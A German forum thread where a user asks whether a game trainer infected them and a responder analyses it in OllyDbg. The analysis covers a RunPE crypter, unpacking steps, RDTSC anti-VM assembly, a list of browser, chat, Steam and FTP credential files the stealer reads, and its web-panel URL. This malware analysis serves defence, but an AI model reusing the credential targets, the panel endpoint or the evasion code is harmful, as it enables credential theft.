Bin ich infiziert? Bin mir nicht sicher!

[EBFE]

okay ^^ danke erstmal vertrauens würdige quellen -.- wo soll ich denn trainer aus vertrauenswürdigen quellen herbekommen XD

Autorseite .
Gibt ja nicht selten, dass da auch Source mitgegeben wird (zumindest bei älteren Trainern, bei Games bin ich schon länger nicht mehr aktuell ). Ein Source schließt zwar eine Infection nicht aus, die Wahrscheinlichkeit jedoch ist schon mal viel geringer. Dann wie hier schon gepostet wurde - SandBoxie/VM. Falls es nicht darin läuft, ist es merkwürdig .

Und BTW: für einen Trainer (die normalerweise in den Speicher der Anwendung eingreifen und den Prozess sonstwie manipulieren) ist die VT Detectionsrate viel zu niedrig. DAS ist auffällig

Danke schonmal wer mir dabei hilft wär auch mal cool zu erfahren wie man sowas 100% testen kann ...

100% wird schonmal schwer. Noch nichtmal durch das Debuggen kann man auf die schnelle 100% sichergehen (davon abgesehen, dass man mindestens paar Monate braucht, um überhaupt mit dem Debugger anständig arbeiten zu können).
Du kannst aber z.B VM installieren und auf dem Hauptrechner WireShark oder ähnlichen Netzwerkverkehranalyser. Damit lässt sich zumindest schauen, ob seltsame Verbindungen nach außen ausgehen.
Falls die Software in der VM nicht startet, lässt man gleich die Finger davon. Mit solchen netten Tools wie ProcessExplorer kann man zudem Details zu laufenden Prozessen anzeigen.
Beispielsweise startet man die Software in der VM. Dabei hat man die z.B im "C:\test" Ordner. Auf den ersten Blick startet die ganz normal. Der ProzessExplorer zeigt aber für diesen Prozess unter "Eigenschaften" ->"Image" den Pfad "C:\dokumente und einstellungen\App Data\bla". Das heißt, dass die Datei erstmal dahin kopiert wurde und dann gestartet <--- also "böse" Datei.

Btw: zu dem angeblichen Trainer:

kleine Analyse im OllyDbg:

kein normaler NET EntryPoint

Code:

004073FE >- FF25 00204000   JMP DWORD PTR DS:[<&mscoree._CorExeMain>>; mscoree._CorExeMain

Den bis jetzt nur bei "NET Crypt0rn" gesehen.

Startet eine komische Firefox.exe von:

Code:

0012E9E4   00D92493  /CALL to CreateProcessA from 00D92491
0012E9E8   00000000  |ModuleFileName = NULL
0012E9EC   00181F18  |CommandLine = "C:\DOCUME~1\IETest\Local Settings\Temp\XNl1zF7eHXTtt\firefox.exe"
SUSPENDED

Original ist die Exe ein:
"Visual Basic Command Line Compiler"

Zumindest bei mir gibt es einen "BAD EXE Format" Fehler zurück, solange "ModuleFileNAme" = NULL ist, aber vielleicht ist mein XP schon so veraltet, dass es nicht mehr berücksichtigt wird .
Oder der "Crypt0rCoder" hat hier einen Fehler gemacht und Code vergessen . Bei mir startet es jedenfalls nur, wenn ich "per Hand" nachhelfe und beim CreateProcessA den ModuleFileName auch auf diese "Firefox.exe" setzte.

Wie dem auch sei, in die gestartete Exe wird neuer Inhalt geschrieben. Also RUNPE Muster.

Komischerweise habe ich keine Anti-VM entdecken können. Der neue Inhalt der "Firefox.exe" lässt sich wunderbar dumpen. Dazu platziert man nach dem "CreateProcessA" Aufruf einen Breakpoint auf ZwResumeThread und wenn dieser aufgerufen wird, kann man in Olly den "firefox" Prozess attachen, über Alt+M die Memory-Map anzeigen lassen und den 400000 Bereich über Rechtsklick -> "Dump memory area" speichern.

Den Dump muss man noch fixen: dazu im CFF Explorer öffnen und bei Section Headers die "RawAddress" Werte gleich "VirtualAddress" setzen.

Nun sieht man, dass es ein IStealer ist. Kann in Olly geladen werden.
Anti-VM:

Code:

00401BBA  |> /0F31          /RDTSC
00401BBC  |. |8BD8          |MOV EBX,EAX
00401BBE  |. |0F31          |RDTSC
00401BC0  |. |2BC3          |SUB EAX,EBX
00401BC2  |. |50            |PUSH EAX
00401BC3  |. |83F8 01       |CMP EAX,1
00401BC6  |.^\74 F2         \JE SHORT DUMP_004.00401BBA
00401BC8  |.  58            POP EAX
00401BC9  |.  3D 00020000   CMP EAX,200
00401BCE  |.  72 09         JB SHORT DUMP_004.00401BD9 <--- zu JMP

Liest aus:

Code:

0012F3B8   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC   7FFDFC00  |FileName = "C:\Program Files\Trillian\users\default\msn.ini"

0012F3B8   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC   7FFDFC00  |FileName = "C:\Program Files\Trillian\users\default\aim.ini"

0012F3B8   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F3BC   7FFDFC00  |FileName = "C:\Program Files\Trillian\users\default\yahoo.ini"

0012F5D8   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F5DC   7FFDFC00  |FileName = "C:\Documents and Settings\IETest\Application Data\.purple\accounts.xml"

0012F248   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F24C   7FFDFC00  |FileName = "C:\program files\steam\ClientRegistry.blob"

0012F5A0   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F5A4   7FFDFC00  |FileName = "C:\Documents and Settings\All Users\Application Data\DynDNS\Updater\config.dyndns"

0012D788   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012D78C   7FFDFC00  |FileName = "C:\Documents and Settings\IETest\Application Data\Mozilla\Firefox\Profiles/enjxr3uc.default/secmod.db"

0012F258   7C82773F  /CALL to CreateFileW from kernel32.7C82773A
0012F25C   7FFDFC00  |FileName = "C:\Documents and Settings\IETest\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data"

0012EE84   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012EE88   7FFDFC00  |FileName = "C:\Documents and Settings\IETest\Application Data\Opera\Opera\wand.dat"

0012F5A0   7C801A53  /CALL to CreateFileW from kernel32.7C801A4E
0012F5A4   7FFDFC00  |FileName = "C:\Documents and Settings\IETest\Application Data\FileZilla\recentservers.xml"

Masterseite:

Code:

004059CB  |.  68 B6564500   PUSH DUMP_004.004556B6                   ;  ASCII "http://hundekopf.hu.funpic.de/blog/index.php/"

ist also gebunden mit dem elitären "realH4x0rT00l" IStealer
Webpanel:
http://hundekopf.hu.funpic.de/blog/index.php/